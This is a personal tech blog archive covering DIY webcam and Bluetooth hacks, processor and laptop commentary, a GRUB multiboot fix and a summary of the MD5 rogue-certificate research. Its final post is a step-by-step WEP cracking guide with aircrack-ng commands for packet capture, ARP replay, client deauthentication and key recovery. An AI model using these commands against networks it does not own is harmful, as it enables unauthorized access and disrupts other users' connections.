Category Archives: Technology

XPS 1210 camera hack.

I got hold of an additional logitech camera that is used in Dell XPS 1210 [just dont ask me how]. I had no use of it as i already had my XPS camera replaced. It laid in my drawer for several weeks and then one day I decided to connect it to my desktop for my younger brother to VDO chat with me.

The advantage of this camera is that it is USB and has a builtin microphone.

So no hassels of connecting a mic to the rear of the cabinet.

What all you need…

1. image007

XPS 1210 camera.

2. image008

USB extension cable and USB connector

3. image009

Something to cut wires and plastic.

4. A CD case of 10 CDs [ the ususal round plastic one ].

What i did was simply cut wires of the camera connector, took another USB connector and connected the same colored wires. Tested it and It worked.

image010 image011 image014

I cut the CD box cover to screw the camera on the hinges like structure that i cut from the same plastic.

I also made a cut on the edge to fix the USB connector.

image015

This is how it looked like after being done.

I used aUSB extension cable to plug the camera into the USB ports on the rear panel of my desktop.

The reason for using the extension was to keep it modular and most of all I didn’t want to cut the extension cable as it was a new one 😉 and It remains usable with other devices.

image017 image016

The above pictures show the end result. And u can see it working!

Bluetooth Headset Antenna Hack

I had an old Orchid mono bluetooth headset lying around in my drawer since so many months. The reson for not using was, I didnt own a bluetooth enabled phone 😉 . Now that i got one. I tried to test it.

3-in-1

And to my disappointment the range was not too good and there was interference when i kept my phone in my trouser pocket. I guess my bidy was acting as a dampner.

So I decided to increase the lenght of its antenna by adding a lenght of copper wire. I know this sounds crazy but sheer craziness works many a times.

It did work and following is how I did it.

I ripped apart my headset.

Took  a small lenght of insulated copper wire. Thin and the kind that is used in small 3V motor winding.antena

all-apart

There in the picture above you can notice a small white bix kinda thing. It has one end connected to the circuit and the other was free.

So making a calculated blind guess, I soldered the wire to the open end and exended the antenna.

open

And wow. It did work.

I then packed it up and took out the wire near the microphone at bottom and then bent it along the crevice to secure it. The extra length was cut off. Now I get enough signal to hear clearly in my ear waht is being transmitted from my Nokia 6500

Ignore the Timing, AMD's News is Huge

As the Test Center’s Brian Sheinberg reports in his review, AMD is delivering to market CPUs, 3.0GHz X4 945 and the 3.2GHz Black Edition X4 955, that could spark a new round of competition in desktop pricing in ways we haven’t seen in a while.

The Black Edition X4 955 is priced at $245, a fraction of the price of PC processors in the same ballpark from Intel. While Intel has been simply dominant for the past two years in both engineering and execution, and its latest Nehalem processors for servers are the most powerful we’ve ever seen, AMD’s latest Black Edition CPU has all the earmarks of a game-changer for system builders and their customers. The AMD pricing scheme on the new chips will invite many into the world of screamingly high performance that otherwise would have had to wait a year or two until Intel pricing dropped.

Here’s how AMD does it, according to Sheinberg’s review:

With another acronym, BEMP (Black Edition Memory Profiles), AMD has worked with memory manufacturers to create a database of specifications for certain high-frequency DDR3 modules. When using a motherboard with a BIOS that supports it, OverDrive 3.0 can use BEMP to look up frequency and latency settings and automatically set the parameters within the BIOS.

Just by using BEMP, our Geekbench2 score jumped to 6,114 but, this being a Black Edition, we decided to push the CPU a little and do some overclocking. Using only stock heat sink and fan cooling, reviewers slowly increased the processor’s multiplier and voltage levels, finally reaching a surprising overall speed of 4.0GHz — almost a full GHz above its out-of-the-box frequency. At this speed, our system’s Geekbench2 score was 7,434.

Getting the most out of a PC’s hardware profile will be key to getting the most out of Windows Vista, Windows 7 when it ships, or even Linux for that matter.

Headlines today may be spread out among other stories, but keep an eye on AMD and its latest PC processors and technology during the coming weeks and months. Keep an eye on Intel, too, and how they may respond.

sourced from: http://www.crn.com/

Mac vs. PC: What you don’t get for $699

I‘m a sucker for a well-made TV ad.

Inspired by the Nike “Just Do It” and “Air Jordan” campaigns of decades past, I mentally mapped out storyboards of the spots I wanted to produce. Nowadays I laugh at clever beer and soda commercials and get mad or pump my fist in the air along with political ads.

I cheered for Apple’s 1997 “Think Different” spot that featured actor Richard Dreyfuss reading the “Here’s to the Crazy Ones” speech. The commercial resonated in a house full of Mac users at a time when Macs were widely considered an endangered species.

Apple’s more recent “Mac vs. PC” ads lampooning Microsoft strike a different chord: Macs are friendly, cool, easy to use, and they don’t have the kinds of problems usually associated with Microsoft’s Windows operating system; PC, portrayed by the hilarious John Hodgman, comes across as ridiculous – not unlike the real-world, buggy Windows Vista.

Now Microsoft is fighting back with its own advertising campaign. I’ve enjoyed some of its elements. The Seinfeld spots were weird. I was intrigued by some of the “I’m a PC” spots that aired last fall, depicting PC users engaged in a variety of jobs – teaching law, protecting endangered species, blogging for Barack Obama.

The message: You can use a Windows PC and still do cool and interesting things. Not bad. Then came the adorable little girls: Kylie, age 4, and Alexa, age 7, e-mailing pictures of fish and stitching together pictures of a fort into one. Microsoft, it seemed, had finally found its advertising voice.

Then came Lauren, the perky, red-haired twentysomething meant to represent an average American shopping for a computer. She wants a notebook with a 17-in. screen, and if she finds it for less than $1,000, she can keep it. Following her as she shops, we learn she considers the Mac too expensive – that she’s not “cool enough to be a Mac person,” she whines.

From the Apple store, it’s off to Best Buy, where she finds a PC that meets her specifications for $699. Mission accomplished, she jumps up and down clapping as though she won on The Price Is Right, ending the spot by saying “I’m a PC, and I got just what I wanted.” Aaaand Cut!

The price weapon
Microsoft used earlier ads to defend itself suitably against Apple’s nerdiness allegations. Now Microsoft is on the advertising offensive, wielding price as a weapon of choice. It’s an effective approach during a recession. But as is always the case with advertising, the full story is more nuanced.

Yes, $699 beats the $2,800 you’d pay for a Mac with a 17-in. screen. But when it comes to PCs, there’s still a great deal more to buy.

First, there’s security software. The PC in question comes with a 60-day trial Norton Internet Security 2009 from Symantec. After the trial runs out you’ll pay Symantec $50 a year to protect your PC (and up to two others in your home) from all the nasty viruses, worms, and other malware lurking on the Internet. That’s $150 over the three years Lauren is likely to hold on to her PC. No need for antivirus on the Mac.

Next, let’s say something goes wrong on the computer once the warranty expires and that it requires the intervention of a third party. Geek Squad will charge you $129 just for a diagnosis. A diagnosis from the Genius Bar in Apple’s retail stores? Free.

Then there’s iLife, the suite of multimedia tools that comes standard on the Mac. With iLife you can organise photos and home movies and turn them into watchable DVDs. Garageband helps you create your own music and another iLife element aids in Web site creation.

Extras cost extra
It’s hard to replicate that bundle if you’re a Windows user. The Hewlett-Packard machine in Lauren’s case does ship with discs for Muvee Reveal, a video-editing program that usually costs $80, and CyberLink DVD Suite, which runs $104.

But if she wants Adobe’s Photoshop Elements, including a membership in Photoshop.com Plus, she’ll need to shell out about $140. Sonic Solutions’ Roxio Creator 2009, which combines video-editing and DVD-creating tools, will cost another $100. And the closest equivalent to Garageband on Windows is Cubase Sequel and it goes for another $100.

Add it all up and it’s not hard to imagine Lauren’s $699 computer costing something closer to $1,500.

But that doesn’t include harder-to-quantify shortcomings. The HP’s battery lasts only 2.5 hours on a charge, compared with eight hours for the 17-in. MacBook Pro, which also happens to be 1.2 lb. lighter and boasts substantially better screen resolution: 1,920 pixels wide by 1,440 high, vs. 1,440 by 900 for the HP.

Even if Lauren doesn’t care about pixels and multimedia software, her machine still doesn’t measure up when it comes to overall consumer satisfaction. No less an authority than Consumer Reports rated Lauren’s computer fourth in a class of six with 17- to 18-in. displays. The MacBook Pro was tops, despite its higher price.

PC makers should focus more on quality
Usually silent on such things, Apple did give me a comment on the Microsoft ads. “A PC is no bargain when it doesn’t do what you want,” Apple spokesman Bill Evans says. “The one thing that both Apple and Microsoft can agree on is that everyone thinks the Mac is cool. With its great designs and advanced software, nothing matches it at any price.” Microsoft declined to comment.

Microsoft and its hardware partners wouldn’t have to make this case had they focused less in the past decade on driving prices down and more on quality. Forrester Research recently released results of a study of consumer experiences with computer companies, assessing their view of a machine’s usefulness, usability, and enjoyability. Apple ran the table in all three categories, well ahead of Gateway (now a unit of Acer), HP, and Dell.

PC makers in the Windows camp have done everything possible to make their products progressively worse by cutting corners to save pennies per unit and boost sales volume. There’s good reason Apple is seeing healthy profits while grabbing market share.

It refuses to budge on quality and so charges a higher price. Rather than running ads that seem clever at first but really aren’t, the Windows guys ought to take the hint and just build better computers.

Reliance Netconnect Broadband+

ADA group company Reliance Communications Limited announced the launch of its CDMA wireless broadband service, Reliance Netconnect Broadband Plus in Lucknow.


Netconect broadband service will be available in 35 cities covering 20,000 towns and 4.5 lakh villages as well as major road and rail routes across the country covering 99 per cent of India’s internet population.

Plans:


Reliance Communications Circle Head of network operations Shishir Shyam said, “Netconnect broadband plus has a peak downlink speed of up to 3.1 Mbps and a separate uplink speed of up to 1.8 Mbps, which is 30 per cent higher downlink rate as compared to any other wireless broadband offering.

I tested the connection in Relience Web world and the speed test results were

1677 Kbps download speed

255 Kbps upload speed

This is real good but the limit on the unlimited plan of 10 GB and the very high price plans will pull back the customers.

I my self am planning to get one for me. Lets see because lot more plans are to be unveiled and many more would be started form 1 May,2009.

This is what they say and now lets see what was the reality.

Leopard, Ubuntu and Windows XP multiboot

I have been a fan of the Mac OS ever since i cam to know about it. When i got my first computer I tried my best to make the windows look like mac but it was not upto my expectations and buys a mac was not an option for me. Then came the OSX86 project and it made my dream come true. I started experimenting with OSX 10.4.8 and kept trying to get it working on my Minimachine [xps 1210]. It took me around 6 months and several GBs of downloads to get tit to work.

I joined college for MBA and the Mac os in its latest flavour named the leopard was with me till i had to let go of it to install Linux because I had never thought that I would be installing 3 OSs simultameously and it went on like that for 6 more months and i was without mac os. Today I reinstalled macosx 10.5.2 and it jsut didnt boot as I had Ubuntu too installed previously and i got the Grub error…

Then I did the following to fix grub and added an entry into grub for booting macosx…

How to fix grub….

1. Boot the Desktop/Live CD. (Use Ubuntu 8.04 or later)

2. Open a terminal (Applications -> Accessories -> Terminal)

3. Start grub as root with the following command :

     sudo grub

4. You will get a grub prompt (see below) which we will use to find the root partition and install grub to the MBR (hd0)

         [ Minimal BASH-like line editing is supported.   For
         the   first   word,  TAB  lists  possible  command
         completions.  Anywhere else TAB lists the possible
         completions of a device/filename. ]

grub>

Type the following and press enter:

find /boot/grub/stage1

If you get "Error 15: File not found", try the following:

find /grub/stage1

Using this information, set the root device (fill in X,Y with whatever the find command returned):

grub> root (hd0,3) // for me it was (hd0,3)

Install Grub:

grub> setup (hd0)

Exit Grub:

grub> quit

Boot into Ubuntu

Open Terminal and run this command.

" sudo gedit /boot/grub/menu.lst "
it will allow to configure your boot order.

3) Edit your OSX in Editor Window.

title OSX86

root (hd0,0) " Replace with your Partition of OSX "

chainloader +1

Now Grub lets me choose which os to boot….

Ubuntu

Leopard

Windows XP

Grub on minimachine
Grub on minimachine

when i chose leopard I am presented with the Darwinx86 booot loader which presents to me all partitions to boot from an if i choose Linux from Darwin then i again get back to Grub…. 🙂

Darwin boot loader on minimachine
Darwin boot loader on minimachine

I just can keep switching between boot loaders and boot any os that I want….

The existing issues of single core only and no camera and card reader and no shut down still bug me… The shutdown and sleep had worked for me at times but not always.

How to export directory listing to text file

I did this a coupl of times and every time i had to look or the information on the web so this time i sortof thought to document it for reference and many others might find it usefull too.

It comes in handy when large list of files with their paths has to be created. As one can not type in the paths for say a directory containing 1000 or so images but to really need to do that for some data base or a gallary.

To do this we just need to type in a single lin in command promt and all s done…

1) Open the command line (cmd.exe in NT/2000/XP)
2) Navigate to the required directory using the cd command.
3) type dir /b>filelist.txt

A file called filelist.txt will be created with the directory contents. If you want to create the file list elsewhere, use a fully qualified file name or use the ..\ convention. Don’t forget that Windows uses \ not / as directory delimiters.

PS3 used to crack ssl

A team of security researchers and academics has broken a core piece of internet technology. They made their work public at the 25th Chaos Communication Congress in Berlin today. The team was able to create a rogue certificate authority and use it to issue valid SSL certificates for any site they want. The user would have no indication that their HTTPS connection was being monitored/modified.

This attack is possible because of a flaw in MD5. MD5 is a hashing algorithm; each unique file has a unique hash. In 2004, a team of Chinese researchers demonstrated creating two different files that had the same MD5 hash. In 2007, another team showed theoretical attacks that took advantage of these collisions. The team focused on SSL certificates signed with MD5 for their exploit.

The first step was doing some broad scans to see what certificate authorities (CA) were issuing MD5 signed certs. They collected 30K certs from Firefox trusted CAs. 9K of them were MD5 signed. 97% of those came from RapidSSL.

Having selected their target, the team needed to generate their rogue certificate to transfer the signature to. They employed the processing power of 200 Playstation 3s to get the job done. For this task, it’s the equivalent of 8000 standard CPU cores or $20K of Amazon EC2 time. The task takes ~1-2 days to calculate. The tricky part was knowing the content of the certificate that would be issued by RapidSSL. They needed to predict two variables: the serial number and the timestamp. RapidSSL’s serial numbers were all sequential. From testing, they knew that RapidSSL would always sign six seconds after the order was acknowledged. Knowing these two facts they were able to generate a certificate in advance and then purchase the exact certificate they wanted. They’d purchase certificates to advance the serial number and then buy on the exact time they calculated.

The cert was issued to their particular domain, but since they controlled the content, they changed the flags to make themselves an intermediate certificate authority. That gave them authority to issue any certificate they wanted. All of these ‘valid’ certs were signed using SHA-1.

If you set your clock back to before August 2004, you can try out their live demo site. This time is just a security measure for the example and this would work identically with a certificate that hasn’t expired. There’s a project site and a much more detailed writeup than this.

To fix this vulnerability, all CAs are now using SHA-1 for signing and Microsoft and Firefox will be blacklisting the team’s rogue CA in their browser products.

source

Residential Program vs non residential programs.

Currently there has been a trend in colleges to have classes around the clock. The classes are scheduled any time throughout the day and there are at times a gap of many hours in between. Consider for example my college. I am a student at Symbiosis Centre for Information technology which only has a residential program, which means that hostel  is compulsory for all students whether you like it or not.  This was my first time staying in a hostel and believe me I enjoyed a lot. Made so many friends and now it all seems like one big family.

It’s not that there are no issues at all between room mates but still one also has altercation in home with brothers and sisters too. Our day begins at 7 am and can go up to 12 in the night. The longest day which we had till now was from 9 in the morning to 12 midnight. Still it is good. We have a lot of time in between classes and people even go to watch movies if there is sufficient time between classes.

Comparing this with my previous experience from my previous college, I was in an Engineering college in Lucknow doing my Computer Engineering. The timing was 9 to 5 and it all felt like normal office. Mostly classes were back to back with one hour of break for lunch but something was missing. There was no feeling of this kind of bonding between the students like we have over here at SCIT.

The residential program teaches a lot. The sense of responsibility due to living on own and the fact that the roommates and the friends are the only people around when something happens creates an unknown sense of bonding among the students. In non residential program its difficult for the students to be together for a very long period to work on something while this not a restriction when you live in a hostel with all your friends.

One more thing I would like to mention over here is that mostly now days instead of professors industry people come to take classes and with a residential program where the students are there 24×7 the visiting faculty can schedule the lecture at any time along with their work.

Cracking WEP in 4 steps

Desclaimer: This is just to show that how insecure WEP is. This guide is not meant to teach how to crack. Use on own discretion. I am not to be held responsible for any harm done.

Prerequisites:

BackTrack 3

Supported wireless card

10 minutes of your time.

 

Step 1: Set the wireless card into monitor mode

>airmon-ng start eth0

“airmon-ng” is the program itself.

“eth0” The name of my wireless card.

 

Step2: Check for available networks and the one you wish to find the key.

Command = “airodump-ng -w capture -c 6 ath0”

“airodump-ng” is the program itself.

“-w capture” Gets it to write the sniffed packets to a file called “capture.cap”.

“-c 6” Makes the program ONLY sniff on channel 6.

“eth0” The name of my wireless card.

 

Step3: Generate some traffic on your own to save time.

Command = “aireplay-ng –arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA eth0”

“aireplay-ng” Name of the program.

“–arpreplay” Is the function of aireplay you are trying to perform, in this case it’s a replay of a ARP request, which will contain IV data.

“-b 00:11:22:33:44:55” MAC address of the target AP.

“-h 66:77:88:99:00:AA” MAC address of the target machine connected to that AP.

“eth0” Name of my wireless card.

Command = “aireplay-ng -e Linksys -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA –deauth 10 ath0”

“aireplay-ng” is the program itself

“-e Linksys” is the name of the SSID of the target AP.

“-a 00:11:22:33:44:55” is the MAC address of the target AP.

“-c 66:77:88:99:00:AA” is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in AiroDump).

“–deauth 10” The type of attack we’re performing, in this case it’s the DEAUTH attack repeated 10 times.

“eth0” The name of my wireless card.

optional step 

 

Step4: Do the cracking of the accumulated packets.

Command= “aircrack-ng capture-01.cap

“aircrack-ng” is the program itself.

Capture is the name of the file we wrote packets into.  -01 is added automatically to the filename and .cap is the extension

Once you hit enter , you would be presented with an index. Select the index number of your AP and hit enter. Wait for the decryption to complete. If enough packets have been captured the key would be decrypted and shown at the end.

Â